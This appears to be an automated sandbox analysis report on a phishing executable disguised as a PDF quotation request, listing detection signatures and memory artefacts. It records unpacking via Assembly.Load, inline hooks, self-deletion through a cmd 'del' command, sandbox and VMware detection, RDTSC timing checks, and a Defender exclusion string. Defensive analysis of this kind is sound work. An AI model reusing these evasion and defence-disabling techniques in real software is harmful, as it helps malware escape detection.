          Source: Binary string: wntdll.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Solicitud urgente de Quotaion_U1197,pdf.exe.f20000.0.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Solicitud urgente de Quotaion_U1197,pdf.exe.f20000.0.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.2.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.1.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.3.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.0.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Solicitud urgente de Quotaion_U1197,pdf.exe.90000.0.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.1.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.5.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.2.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.7.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.0.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.9.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.3.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.d50000.1.unpack, S6/xq.cs .Net Code: om System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 0_2_018FE110 push eax; retn 0577h
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041783B push cs; retf
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041794C push ebx; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_00416939 push 8A1A9327h; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0040E328 push 3E78F232h; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_004163FF push esi; iretd
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0465D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013783B push cs; retf
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_00136939 push 8A1A9327h; iretd
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013794C push ebx; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0012E328 push 3E78F232h; iretd
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013DBDE push ebx; retf
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_001363FF push esi; iretd
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013D502 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0013D56C push eax; ret
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe Static PE information: 0xD47F48BF [Mon Dec 21 20:44:47 2082 UTC]
          Source: initial sample Static PE information: section name: .text entropy: 7.76378455521

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE7
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.Solicitud urgente de Quotaion_U1197,pdf.exe.3321c04.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Solicitud urgente de Quotaion_U1197,pdf.exe PID: 6204, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000129B7E second address: 0000000000129B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe TID: 5128 Thread sleep time: -36039s >= -30000s
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe TID: 4060 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6480 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Code function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Thread delayed: delay time: 36039
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.312931928.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.346806306.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.346806306.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.333883657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0462746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04643D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04683540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04627D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0460AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0468A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04686DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0460E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04638E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04648EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0469FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0462F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04618794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04624120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0464927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04694257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04618A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04623A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
